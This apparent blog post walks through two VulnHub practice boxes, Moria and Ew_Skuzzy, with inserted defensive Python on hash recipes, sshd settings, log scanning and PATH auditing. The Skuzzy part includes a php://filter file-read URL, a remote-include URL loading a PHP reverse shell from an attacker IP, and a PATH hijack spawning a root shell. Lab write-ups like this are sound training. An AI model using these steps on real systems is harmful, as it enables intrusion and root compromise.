Download
https://www.vulnhub.com/entry/moria-1,187/
Goal
uid=0(root) gid=0(root) groups=0(root)
Walkthrough
Initial nmap shows ftp on 21, ssh on 22, and web on 80
Looking at the website it shows the Gates of Moria
Next we scan with dirb and get a listable directory named w
Browsing to that directory we see there is an h directory inside it as well
Going down the rabbit hole, the nested directory names end up spelling whisper, with a final directory named the_abyss
From here a random message appears with each refresh. There were 13 in total, and they just repeat at random
Unable to find anything else we go back to FTP and try anonymous login, but nothing... it had already been checked during the nmap scan, but whatever
First we need a username, so I gather all the names from the random messages in the_abyss
Balin
Oin
Ori
Fundin
Nain
Eru
Maeglin
Telchar
Thrain
Dain
Next we need a password, but I only have my limited, movie-only knowledge of LOTR...great. So I remember when they're at the Gates of Moria and speak the elvish word for friend. No idea what they said though...to Google!
We search for "gates of moria friend" and the results yield Doors of Durin. Scrolling through we find the word...Mellon. Lots of trial and error took place and no luck. Then looking at the FTP banner it says welcome Balrog...duh
We try the uppercase/lowercase combinations for the name and password and finally get a match: Balrog/Mellon. We're in, but with limited abilities...
Even though we're limited we can still browse the file system...
Then I remember SSH, but that's a dead end :(
So I attempt to find a username, but no luck in /home or /etc/passwd
But /var/mail shows users :)
Now that we have a username Ori, we need a password...
Still with browse capability over FTP, I take a look through the web directories and sure enough there is a directory named with a random string
Back to the web and browsing to the new directory yields usernames and passkeys
No known MD5 hashes were found for user Ori or any of the others, so I took a look at the page source and sure enough the salt and the hash format are sitting in a comment
Now what...back to Google. This one took me some time, but after random searches and playing around with the format, the search "john format dynamic" led me to this helpful page
First the username, hash, and salt were added to a file in the proper format
Next, running john with the correct dynamic format against the file yielded all the passwords
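The mechanics behind that step, as an added example that is not code from the original post: john's "dynamic" formats name a recipe such as md5($p.$s) or md5(md5($p).$s), and once the page-source comment hands you the salt and the recipe, each guess costs one or two MD5 calls. The record below is constructed (user, password, salt and the recipe used are all assumptions, not Moria's data); identify_recipe shows how a known password pins down the recipe, and hash_password/verify_password show the storage-side fix, a slow salted KDF where the salt may be public and the work factor is the defence.

```python
import hashlib
import hmac
import os

def _md5hex(data):
    return hashlib.md5(data).hexdigest()

# Salted-MD5 recipes in john's "dynamic" notation: $p = password, $s = salt.
# Which recipe Moria's page actually declared is not stated above; the choice below is an
# assumption used only to build the constructed sample record.
RECIPES = {
    "md5($p.$s)": lambda p, s: _md5hex(p + s),
    "md5($s.$p)": lambda p, s: _md5hex(s + p),
    "md5(md5($p).$s)": lambda p, s: _md5hex(_md5hex(p).encode() + s),
    "md5($s.md5($p))": lambda p, s: _md5hex(s + _md5hex(p).encode()),
}

def identify_recipe(password, salt, hexhash):
    """Name of the recipe that reproduces hexhash from this password and salt, or None."""
    p, s = password.encode(), salt.encode()
    for name, recipe in RECIPES.items():
        if hmac.compare_digest(recipe(p, s), hexhash.lower()):
            return name
    return None

def make_sample_record():
    """Constructed record in the shape of the leaked page (user, hash, salt); not Moria's real data."""
    user, password, salt = "ori", "example-pass", "constructed-salt"
    return {"user": user, "password": password, "salt": salt,
            "hash": RECIPES["md5(md5($p).$s)"](password.encode(), salt.encode())}

# The fix on the storage side: a slow, per-user salted KDF (PBKDF2-HMAC-SHA256 here).
PBKDF2_ROUNDS = 200_000

def hash_password(password, salt=None):
    """Return a self-describing string: algorithm$rounds$salt$digest."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ROUNDS, salt.hex(), digest.hex())

def verify_password(password, stored):
    """Recompute with the stored salt and round count; constant-time compare."""
    _algo, rounds, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(digest.hex(), digest_hex)

if __name__ == "__main__":
    rec = make_sample_record()
    print("leaked record:", rec["user"], rec["hash"], rec["salt"])
    print("recipe matching the known password:", identify_recipe(rec["password"], rec["salt"], rec["hash"]))
    stored = hash_password(rec["password"])
    print("stored as:", stored, "verifies:", verify_password(rec["password"], stored))
```

Run it directly to see the constructed record, the recipe match, and a PBKDF2 string in the format a sensible application would store; the point of the contrast is that leaking the salt and format of a fast hash leaves one MD5 per guess, while the KDF's round count is what a cracker cannot skip.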
Using the new credentials for Ori, we're able to get a shell
Scouring the entire system and finding nothing, I finally came back to the /home/Ori directory and took a look at the .ssh folder
Looking at the known_hosts file we see Ori connects to localhost? With that I try ssh as root to localhost and BOOM...root and flag.txt :)
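The root hop over loopback SSH comes down to two sshd settings, so here is an added example (not from the original post, and the config excerpt is constructed, not the box's real file) that parses the global section of an sshd_config and reports the settings that make an Ori-to-root hop possible. It treats the OpenSSH defaults (PermitRootLogin prohibit-password, PasswordAuthentication yes) as the values in force when a directive is absent.

```python
import re

# Constructed sshd_config excerpt of the kind that allows the Ori -> root hop (not Moria's real file).
SAMPLE_SSHD_CONFIG = """\
# constructed sample
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PubkeyAuthentication yes
Match User ori
    PasswordAuthentication no
"""

def parse_sshd_config(text):
    """Global directives as {keyword_lower: value}. First occurrence wins, as in sshd;
    parsing stops at the first Match block, whose conditional overrides are out of scope here."""
    directives = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[ \t=]+", line, maxsplit=1)  # sshd accepts "Key value" and "Key=value"
        key = parts[0].lower()
        if key == "match":
            break
        if len(parts) == 2 and key not in directives:
            directives[key] = parts[1].strip()
    return directives

def audit_root_login(text):
    """Findings for the two settings that turn a foothold like Ori's into root over loopback SSH."""
    cfg = parse_sshd_config(text)
    findings = []
    prl = cfg.get("permitrootlogin", "prohibit-password")  # OpenSSH default since 7.0
    if prl == "yes":
        findings.append("PermitRootLogin yes: root may log in with a password or a key; set it to no")
    elif prl in ("prohibit-password", "without-password"):
        findings.append("PermitRootLogin %s: a key in /root/.ssh/authorized_keys still lets a "
                        "local user hop to root; set it to no" % prl)
    if cfg.get("passwordauthentication", "yes") == "yes":
        findings.append("PasswordAuthentication yes: a cracked password (like Ori's) works "
                        "directly over SSH; prefer keys only")
    return findings

if __name__ == "__main__":
    for finding in audit_root_login(SAMPLE_SSHD_CONFIG):
        print("-", finding)
```

Note the second branch: the modern default still permits key-based root login, which is exactly the shape of the localhost hop above, so "PermitRootLogin no" plus a sudo rule for the one account that needs it is the setting to look for.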
Friday, April 28, 2017
Thursday, April 20, 2017
Vulnhub Walkthrough: Ew_Skuzzy 1
Download
https://www.vulnhub.com/entry/ew_skuzzy-1,184/
Goal
flags
uid=0(root) gid=0(root) groups=0(root)
Walkthrough
Initial nmap shows ssh on 22, web on 80, and iscsi on 3260
Looking at the website we get a hint to scan the website using dirbuster
I'm more of a dirb guy, so let's see what we find using that tool
*snippet of dirb results
All of the dirb results were junk except the last long URL
Looking at the page, oh hello Lionel
Let's look at the page source and there is a long commented string (actually strings)
Base64 decoding them shows Lionel trolled us
With nothing else, we go back to see what we can find from the open iscsi port on 3260
Wait, ew skuzzy...iscsi....oh I get it :)
Google is always your friend, which yielded this helpful page
https://www.pentestpartners.com/blog/an-interesting-route-to-domain-admin-iscsi/
After installing iscsi tools I'm able to discover and connect to the target
iscsiadm -m node -p 192.168.0.130 -l iqn.2017-02.local.skuzzy:storage.sys0
fdisk reveals a new disk available at /dev/sdb
First we create the mount point /mnt/skuzzy, then mount the disk and list its contents. Look at that, flag1 is revealed
flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}
Looking back at the mounted disk contents we see what appears to be another mountable disk image called bobsdisk.dsk. Creating a mount point (/mnt/bob), mounting the image, and listing it we find an email file ToAlice.eml and an encrypted file ToAlice.csv.enc
Looking at ToAlice.eml, there's a lot of useful information, and some that is misleading in my opinion, about how to decrypt the ToAlice.csv.enc file. Also flag2 is revealed :)
flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}
So to decrypt the ToAlice.csv.enc file, the email gives you everything you need including the password. It hints that you need to use RockYou, but the password is right there, and with that flag3 is revealed along with more URLs
openssl enc -d -aes256 -in /mnt/bob/ToAlice.csv.enc -out /mnt/bob/ToAlice.csv -k supercalifragilisticoespialidoso
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84}
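What that openssl command actually does with the password, as an added example (not code from the original post): an `openssl enc` file starts with the 8-byte magic Salted__ and an 8-byte salt, and the key and IV are derived from the password with OpenSSL's EVP_BytesToKey, which is one digest round per guess (MD5 before OpenSSL 1.1.0, SHA-256 from 1.1.0 on). The blob below is constructed and only has the header layout, so this demonstrates the parsing and key derivation, not the AES decryption itself (which needs a non-stdlib AES implementation).

```python
import hashlib

MAGIC = b"Salted__"

def split_openssl_enc(blob):
    """Split `openssl enc` output into (salt, ciphertext): 8-byte magic, 8-byte salt, then AES-CBC data."""
    if len(blob) < 16 or not blob.startswith(MAGIC):
        raise ValueError("not an OpenSSL enc blob with a Salted__ header")
    return blob[8:16], blob[16:]

def evp_bytes_to_key(password, salt, key_len=32, iv_len=16, digest="md5", count=1):
    """OpenSSL's EVP_BytesToKey: D_1 = H(pw||salt), D_i = H(D_{i-1}||pw||salt), concatenated
    until key_len + iv_len bytes are available. `openssl enc -k` uses count=1."""
    out, prev = b"", b""
    while len(out) < key_len + iv_len:
        block = prev + password + salt
        for _ in range(count):
            block = hashlib.new(digest, block).digest()
        prev = block
        out += block
    return out[:key_len], out[key_len:key_len + iv_len]

def key_material_for_aes256(blob, password, digest="md5"):
    """Key and IV that `openssl enc -d -aes256 -k <password>` would derive for this blob."""
    salt, _ciphertext = split_openssl_enc(blob)
    return evp_bytes_to_key(password, salt, 32, 16, digest)

# Constructed blob in the file layout (fixed salt, zeroed body); not the real ToAlice.csv.enc.
SAMPLE_BLOB = MAGIC + bytes.fromhex("0011223344556677") + b"\x00" * 32
PASSWORD = b"supercalifragilisticoespialidoso"  # the password the email hands over

if __name__ == "__main__":
    salt, ciphertext = split_openssl_enc(SAMPLE_BLOB)
    print("salt:", salt.hex(), "ciphertext bytes:", len(ciphertext))
    for digest in ("md5", "sha256"):
        key, iv = key_material_for_aes256(SAMPLE_BLOB, PASSWORD, digest)
        print(digest, "key:", key.hex(), "iv:", iv.hex())
```

The security point is the cost model: with count=1 the key for each wordlist candidate is one or two hash calls, so a dictionary word as the passphrase is exactly as weak as the email's RockYou hint suggests; the mitigation on the sender's side is a non-dictionary passphrase and, on OpenSSL 1.1.1 and later, `-pbkdf2` with a high `-iter` count so each guess costs thousands of rounds.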
Now back to the web and the URLs we found. The first one has some sweet scrolling marquee
Source code reveals more long commented strings
Base64 decoding the strings reveals a Seinfeld troll :P
The next URL looks more interesting and its title states we're on the right track
Looking at the links, the first three are nothing of importance
welcome.php
flag.php
party.php also includes link out to http://cultofthepartyparrot.com
The last link, reader.php, has a link called Load Feed. When clicked it actually calls out, via a url parameter, to a file named data.txt on the local file system
http://192.168.0.130/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt
From here it looks like we might be able to do some LFI, so back to Google and we find this helpful site for a reminder :) https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/
Giving it a try on the data.txt file, we're given a long string
Base64 decoding the string reveals the source code, and it seems that instead of normal php tags this app uses ##php##
With that I started checking all the .php files behind the links, and flag.php revealed flag4 and also said we'll need it later for shell access
flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
Base64 decoding reader.php gave the entire source code, which hints that we need to provide a key
*snippet of reader.php
Trying RFI pointing at Kali, we're told that we need a key for authentication
http://192.168.0.130/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://192.168.0.131
Before anything else I prep the php reverse shell on Kali, making sure to replace the opening and closing php tags with ##php##
Using flag4 as the key and calling our php reverse shell we now have a limited reverse shell :)
http://192.168.0.130/c2444910794e037ebd8aaf257178c90b/?p=reader&key=flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}&url=http://192.168.0.131/bzyo.php
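From the defender's side, the three reader.php requests above (loopback data.txt, php://filter read of the source, remote PHP file) are distinguishable in the access log by the url= parameter alone. Here is an added example, not code from the original post, with constructed log lines modelled on those requests (the timestamps and byte counts are made up); scan_log classifies each feed request, and safe_feed_path is the hardened replacement the application should have used, a bare feed name resolved inside one directory instead of an arbitrary URL.

```python
import os
import re
from urllib.parse import parse_qs, urlparse

# Constructed access-log lines modelled on the requests above; not captured from the box.
SAMPLE_LOG = """\
192.168.0.131 - - [20/Apr/2017:10:01:02 -0400] "GET /c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt HTTP/1.1" 200 512
192.168.0.131 - - [20/Apr/2017:10:02:15 -0400] "GET /c2444910794e037ebd8aaf257178c90b/?p=reader&url=php://filter/convert.base64-encode/resource=reader.php HTTP/1.1" 200 4096
192.168.0.131 - - [20/Apr/2017:10:03:40 -0400] "GET /c2444910794e037ebd8aaf257178c90b/?p=reader&key=flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}&url=http://192.168.0.131/bzyo.php HTTP/1.1" 200 0
192.168.0.131 - - [20/Apr/2017:10:04:00 -0400] "GET /c2444910794e037ebd8aaf257178c90b/?p=welcome HTTP/1.1" 200 300
"""
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
PHP_WRAPPERS = ("php", "file", "data", "phar", "expect", "glob")

def classify_feed_url(url):
    """Bucket a url= value by what reader.php would do with it."""
    u = urlparse(url)
    if u.scheme in PHP_WRAPPERS:
        return "wrapper"       # php://filter and friends: reads local files (the LFI step above)
    if u.scheme in ("http", "https"):
        if u.hostname in ("127.0.0.1", "localhost", "::1"):
            return "loopback"  # the only thing the app legitimately did
        return "remote"        # fetching attacker-hosted PHP (the RFI step above)
    return "other"

def scan_log(text):
    """Every reader.php feed request in the log, with its classification and whether a key was sent."""
    events = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = match.group(1).partition("?")[2]
        params = parse_qs(query)
        if params.get("p") != ["reader"] or "url" not in params:
            continue
        url = params["url"][0]
        events.append({"url": url, "kind": classify_feed_url(url), "key_present": "key" in params})
    return events

def safe_feed_path(name, base_dir):
    """Hardened replacement for a url= parameter: a feed name resolved inside one directory, or None."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if candidate != base and candidate.startswith(base + os.sep):
        return candidate
    return None

if __name__ == "__main__":
    for event in scan_log(SAMPLE_LOG):
        print(event["kind"].ljust(8), "key" if event["key_present"] else "   ", event["url"])
    print(safe_feed_path("data.txt", "/srv/feeds"), safe_feed_path("../../etc/passwd", "/srv/feeds"))
```

Anything classified "wrapper" or "remote" is worth an alert on its own; a "remote" request that also carries the key parameter is the shape of the shell above and deserves an immediate look at what the web server process did next.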

Privilege escalation took me some time as I was stuck on finding something with iscsi. After going through the go-to privilege escalation guide, the file alicebackup stood out as the other key files included alice in the name
Looking closer, the file is executable, so I run it: it runs the command /usr/bin/id and attempts an ssh connection
I spent some time looking at HOSTALIASES, but that obviously didn't pan out, so I took a step back...
I know that alicebackup runs the id utility when executed, since it prints out that root is running the program. However, it's probably calling id by its relative name rather than its full path
Let's copy /bin/sh to the /tmp folder, rename it id, and then add /tmp to the PATH
Running alicebackup now triggers the id in the /tmp folder, but instead of printing the user it spawns a root shell, and flag5 is revealed in the root folder :)
flag5{42273509a79da5bf49f9d40a10c512dd96d89f6a}
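The alicebackup bug is a privileged program resolving a helper through the caller's PATH. As an added example (not code from the original post), this reproduces the finding with a scratch directory standing in for /tmp and shows the two fixes: resolve helpers only from a fixed list of trusted directories, and audit the PATH a privileged program would otherwise inherit. The trusted directory list is an assumption about the distro's layout, and the planted script is constructed.

```python
import os
import shutil
import stat
import tempfile

# Assumption: the directories a privileged program may trust for helper binaries on this distro.
TRUSTED_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")

def resolve_like_shell(cmd, path):
    """What system("id") does: first match in PATH order, whoever owns that directory."""
    return shutil.which(cmd, path=path)

def resolve_trusted(cmd):
    """Hardened lookup: ignore the caller's PATH and search only the trusted directories."""
    return shutil.which(cmd, path=os.pathsep.join(TRUSTED_DIRS))

def risky_path_entries(path):
    """PATH entries a setuid/root program must never inherit: empty, relative, or world-writable."""
    risky = []
    for entry in path.split(os.pathsep):
        if entry == "" or not os.path.isabs(entry):
            risky.append(entry)
            continue
        try:
            mode = os.stat(entry).st_mode
        except OSError:
            continue
        if mode & stat.S_IWOTH:  # sticky bit does not help: anyone can still create a new "id" here
            risky.append(entry)
    return risky

def demo_path_hijack():
    """Reproduce the alicebackup finding with a scratch directory standing in for /tmp (constructed)."""
    with tempfile.TemporaryDirectory() as scratch:
        planted = os.path.join(scratch, "id")
        with open(planted, "w") as fh:
            fh.write("#!/bin/sh\necho 'this is not the real id'\n")
        os.chmod(planted, 0o755)
        os.chmod(scratch, 0o1777)  # world-writable with sticky bit, like /tmp
        path = os.pathsep.join((scratch,) + TRUSTED_DIRS)
        return {
            "scratch": scratch,
            "planted": planted,
            "shell_picks": resolve_like_shell("id", path),
            "trusted_picks": resolve_trusted("id"),
            "risky": risky_path_entries(path),
        }

if __name__ == "__main__":
    result = demo_path_hijack()
    print("PATH lookup picks:   ", result["shell_picks"])
    print("trusted lookup picks:", result["trusted_picks"])
    print("risky PATH entries:  ", result["risky"])
```

The same audit applied to a real host means checking every root-run cron job, setuid binary and backup script for helpers invoked by bare name; the C-level fix is execve with an absolute path and a sanitized environment rather than system() with whatever PATH the caller set.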